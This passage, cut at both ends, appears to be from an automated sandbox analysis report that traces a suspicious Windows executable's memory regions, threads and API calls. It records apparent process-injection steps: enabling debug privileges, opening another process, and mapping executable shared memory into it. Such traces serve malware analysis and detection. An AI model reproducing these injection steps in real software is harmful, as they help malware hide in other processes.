start_va = 0x14b0000 end_va = 0x152ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 4585 start_va = 0x20e0000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 4586 start_va = 0x7fef4850000 end_va = 0x7fef4864fff monitored = 0 entry_point = 0x7fef4851020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Thread: id = 33 os_tid = 0xe74 Thread: id = 34 os_tid = 0xe70 Thread: id = 35 os_tid = 0xdcc Thread: id = 36 os_tid = 0xcc4 Thread: id = 37 os_tid = 0xc70 Thread: id = 38 os_tid = 0x9a4 Thread: id = 39 os_tid = 0x550 Thread: id = 40 os_tid = 0x6b0 Thread: id = 41 os_tid = 0x244 Thread: id = 42 os_tid = 0x768 Thread: id = 43 os_tid = 0x67c Thread: id = 44 os_tid = 0x520 Thread: id = 45 os_tid = 0x4f8 Thread: id = 46 os_tid = 0x5f8 Thread: id = 47 os_tid = 0x538 Thread: id = 48 os_tid = 0x4b0 Thread: id = 49 os_tid = 0x720 Thread: id = 50 os_tid = 0x338 Thread: id = 51 os_tid = 0x150 Thread: id = 52 os_tid = 0x2f4 Thread: id = 53 os_tid = 0x1e0 Thread: id = 54 os_tid = 0x57c Thread: id = 55 os_tid = 0x320 Thread: id = 56 os_tid = 0x5d4 Thread: id = 57 os_tid = 0x36c Thread: id = 58 os_tid = 0x418 Thread: id = 59 os_tid = 0x2a8 Thread: id = 60 os_tid = 0x76c Thread: id = 61 os_tid = 0x764 Thread: id = 62 os_tid = 0x70c Thread: id = 63 os_tid = 0x6fc Thread: id = 64 os_tid = 0x6f4 Thread: id = 65 os_tid = 0x6e8 Thread: id = 66 os_tid = 0x6c8 Thread: id = 67 os_tid = 0x6ac Thread: id = 68 os_tid = 0x69c Thread: id = 69 os_tid = 0x688 Thread: id = 70 os_tid = 0x44c Thread: id = 71 os_tid = 0x440 Thread: id = 72 os_tid = 0x43c Thread: id = 73 os_tid = 0x430 Thread: id = 74 os_tid = 0x428 Thread: id = 75 os_tid = 0x41c Thread: id = 76 os_tid = 0x3f0 Thread: id = 77 os_tid = 0x3e8 Thread: id = 78 os_tid = 0x3dc Thread: id = 79 os_tid = 0x380 Thread: id = 80 os_tid = 0x37c Thread: id = 81 os_tid = 0x370 Thread: id = 82 os_tid = 0x368 Thread: id = 83 os_tid = 0xe78 Thread: id = 84 os_tid = 0xe7c Thread: id = 85 os_tid = 0xe80 Thread: id = 86 os_tid = 0xe84 Thread: id = 87 os_tid = 0xe88 Thread: id = 88 os_tid = 0xe8c Thread: id = 138 os_tid = 0xf0c Thread: id = 139 os_tid = 0xf10 Thread: id = 140 os_tid = 0xf14 Thread: id = 141 os_tid = 0xf18 Thread: id = 142 os_tid = 0xf1c Thread: id = 143 os_tid = 0xf24 Thread: id = 177 os_tid = 0xf50 Thread: id = 200 os_tid = 0xfc0 Thread: id = 202 os_tid = 0xfcc Process: id = "6" image_name = "ibeframnk863.exe" filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe" page_root = "0x28f25000" os_pid = "0xec0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xe24" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1460 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1461 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1462 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1463 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1464 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1465 start_va = 0x1e0000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1466 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1467 start_va = 0x1250000 end_va = 0x12edfff monitored = 1 entry_point = 0x12e9786 region_type = mapped_file name = "ibeframnk863.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe") Region: id = 1468 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1469 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1470 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1471 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1472 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1473 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1474 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1475 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1476 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1477 start_va = 0x400000 end_va = 0x42efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1478 start_va = 0x590000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1479 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1480 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1481 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1482 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1483 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1484 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1485 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 1486 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1487 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1488 start_va = 0x610000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1489 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1490 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1491 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1492 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1493 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1494 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1495 start_va = 0x430000 end_va = 0x56bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1503 start_va = 0x870000 end_va = 0x9f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1504 start_va = 0xa00000 end_va = 0xd02fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 1506 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1507 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1508 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1509 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1510 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1511 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1512 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1513 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1514 start_va = 0xe0000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1515 start_va = 0xe0000 end_va = 0x10efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1516 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1517 start_va = 0x370000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1518 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1519 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1520 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1521 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1522 start_va = 0x870000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 1941 start_va = 0x110000 end_va = 0x123fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1942 start_va = 0x150000 end_va = 0x163fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1943 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1944 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1945 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1946 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1947 start_va = 0x170000 end_va = 0x18dfff monitored = 0 entry_point = 0x18158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1948 start_va = 0xd10000 end_va = 0xe97fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d10000" filename = "" Region: id = 1949 start_va = 0x170000 end_va = 0x18dfff monitored = 0 entry_point = 0x18158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1950 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1951 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1952 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1953 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1954 start_va = 0xea0000 end_va = 0x1020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 1955 start_va = 0x12f0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012f0000" filename = "" Region: id = 1986 start_va = 0x180000 end_va = 0x1aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1988 start_va = 0x20000 end_va = 0x37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Thread: id = 93 os_tid = 0xec4 [0120.882] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x36ec20 | out: HeapArray=0x36ec20*=0x770000) returned 0x1 [0120.893] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x36ebd0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.895] NtCreateFile (in: FileHandle=0x36ebf0, DesiredAccess=0x120089, ObjectAttributes=0x36ebb8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x36ebd8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x36ebf0*=0x20, IoStatusBlock=0x36ebd8*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0120.908] RtlFreeHeap (HeapHandle=0x770000, Flags=0x0, BaseAddress=0x773498) returned 1 [0120.912] NtQueryInformationFile (in: FileHandle=0x20, IoStatusBlock=0x36ebd8, FileInformation=0x36eb30, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x36ebd8, FileInformation=0x36eb30) returned 0x0 [0120.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13bb40) returned 0x430020 [0121.787] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x36ec04, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x36ec04, ResultLength=0x0) returned 0x0 [0121.791] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x36ec28, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x36ec28, ReturnLength=0x0) returned 0x0 [0121.799] RtlFreeHeap (HeapHandle=0x770000, Flags=0x0, BaseAddress=0x870020) returned 1 [0121.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x36e8b8*=0x0, ZeroBits=0x0, RegionSize=0x36e8bc*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x36e8b8*=0x20000, RegionSize=0x36e8bc*=0x10000) returned 0x0 [0121.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0xc0000004 [0121.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x36ec18*=0x20000, RegionSize=0x36e8dc, FreeType=0x8000) returned 0x0 [0121.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x36e8a4*=0x0, ZeroBits=0x0, RegionSize=0x36e8a8*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x36e8a4*=0x20000, RegionSize=0x36e8a8*=0x20000) returned 0x0 [0121.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0121.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x36ec18*=0x20000, RegionSize=0x36ec1c, FreeType=0x8000) returned 0x0 [0122.004] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x36e9d4 | out: Value="kEecfMwgj") returned 0x0 [0122.004] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x36ea44 | out: BaseAddress=0x36ea44*=0x77180000) returned 0x0 [0122.021] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x36ec30 | out: TokenHandle=0x36ec30*=0x40) returned 0x0 [0122.024] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x36ec24 | out: lpLuid=0x36ec24*(LowPart=0x14, HighPart=0)) returned 1 [0122.030] NtAdjustPrivilegesToken (in: TokenHandle=0x40, DisableAllPrivileges=0, NewState=0x36ec20, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0122.032] NtClose (Handle=0x40) returned 0x0 [0122.033] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x36e1fc | out: Value="kEecfMwgj") returned 0x0 [0122.042] RtlSetEnvironmentVariable (in: Environment=0x0, Name="N6NQC5EB", Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe" | out: Environment=0x0) returned 0x0 [0122.043] NtCreateSection (in: SectionHandle=0x36e6fc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x36e49c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x36e6fc*=0x40) returned 0x0 [0122.046] NtMapViewOfSection (in: SectionHandle=0x40, ProcessHandle=0xffffffff, BaseAddress=0x36e700*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x36e49c*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x36e700*=0xe0000, SectionOffset=0x0, ViewSize=0x36e49c*=0x2f000) returned 0x0 [0122.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x36de04*=0x0, ZeroBits=0x0, RegionSize=0x36de08*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x36de04*=0x20000, RegionSize=0x36de08*=0x10000) returned 0x0 [0122.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0xc0000004 [0122.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x36e490*=0x20000, RegionSize=0x36de28, FreeType=0x8000) returned 0x0 [0122.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x36ddf0*=0x0, ZeroBits=0x0, RegionSize=0x36ddf4*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x36ddf0*=0x20000, RegionSize=0x36ddf4*=0x20000) returned 0x0 [0122.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0122.055] NtOpenProcess (in: ProcessHandle=0x36e458, DesiredAccess=0x438, ObjectAttributes=0x36e478*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x36e44c*(UniqueProcess=0x45c, UniqueThread=0x0) | out: ProcessHandle=0x36e458*=0x88) returned 0x0 [0122.055] NtQueryInformationProcess (in: ProcessHandle=0x88, ProcessInformationClass=0x1a, ProcessInformation=0x36e164, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x36e164, ReturnLength=0x0) returned 0x0 [0122.055] NtCreateSection (in: SectionHandle=0x36de00, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x36ddc0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x36de00*=0x8c) returned 0x0 [0122.055] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x36de08*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x36ddc0*=0x170200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x36de08*=0x870000, SectionOffset=0x0, ViewSize=0x36ddc0*=0x171000) returned 0x0 [0122.061] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x88, BaseAddress=0x36de04*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x36ddfc*=0x170200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x36de04*=0x8b40000, SectionOffset=0x0, ViewSize=0x36ddfc*=0x171000) returned 0x0 [0123.576] NtClose (Handle=0x8c) returned 0x0 [0123.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2000) returned 0x784670 [0123.582] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x36dacc | out: TokenHandle=0x36dacc*=0x8c) returned 0x0 [0123.586] NtQueryInformationToken (in: TokenHandle=0x8c, TokenInformationClass=0x1, TokenInformation=0x36d2c4, TokenInformationLength=0x400, ReturnLength=0x36dac4 | out: TokenInformation=0x36d2c4, ReturnLength=0x36dac4) returned 0x0 [0123.587] ConvertSidToStringSidW (in: Sid=0x36d2cc*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x36dac8 | out: StringSid=0x36dac8*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0123.587] NtClose (Handle=0x8c) returned 0x0 [0123.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x36dd3c*=0x0, ZeroBits=0x0, RegionSize=0x36dd40*=0x13f26, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x36dd3c*=0x110000, RegionSize=0x36dd40*=0x14000) returned 0x0 [0123.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x36dd28*=0x0, ZeroBits=0x0, RegionSize=0x36dd2c*=0x13f26, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x36dd28*=0x150000, RegionSize=0x36dd2c*=0x14000) returned 0x0 [0123.597] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x36dd3c*=0x41f2c6, NumberOfBytesToProtect=0x36dd40, NewAccessProtection=0x40, OldAccessProtection=0x36dd88 | out: BaseAddress=0x36dd3c*=0x41f000, NumberOfBytesToProtect=0x36dd40, OldAccessProtection=0x36dd88*=0x40) returned 0x0 [0123.597] RtlFreeHeap (HeapHandle=0x770000, Flags=0x0, BaseAddress=0x784670) returned 1 [0123.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x36db34, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0123.609] NtCreateFile (in: FileHandle=0x36db54, DesiredAccess=0x120089, ObjectAttributes=0x36db1c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x36db3c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x36db54*=0x8c, IoStatusBlock=0x36db3c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0123.609] RtlFreeHeap (HeapHandle=0x770000, Flags=0x0, BaseAddress=0x7707f0) returned 1 [0123.613] NtQueryInformationFile (in: FileHandle=0x8c, IoStatusBlock=0x36db3c, FileInformation=0x36d8b0, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x36db3c, FileInformation=0x36d8b0) returned 0x0 [0123.613] NtClose (Handle=0x8c) returned 0x0 [0123.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x208) returned 0x7707f0 [0123.613] RtlFreeHeap (HeapHandle=0x770000, Flags=0x0, 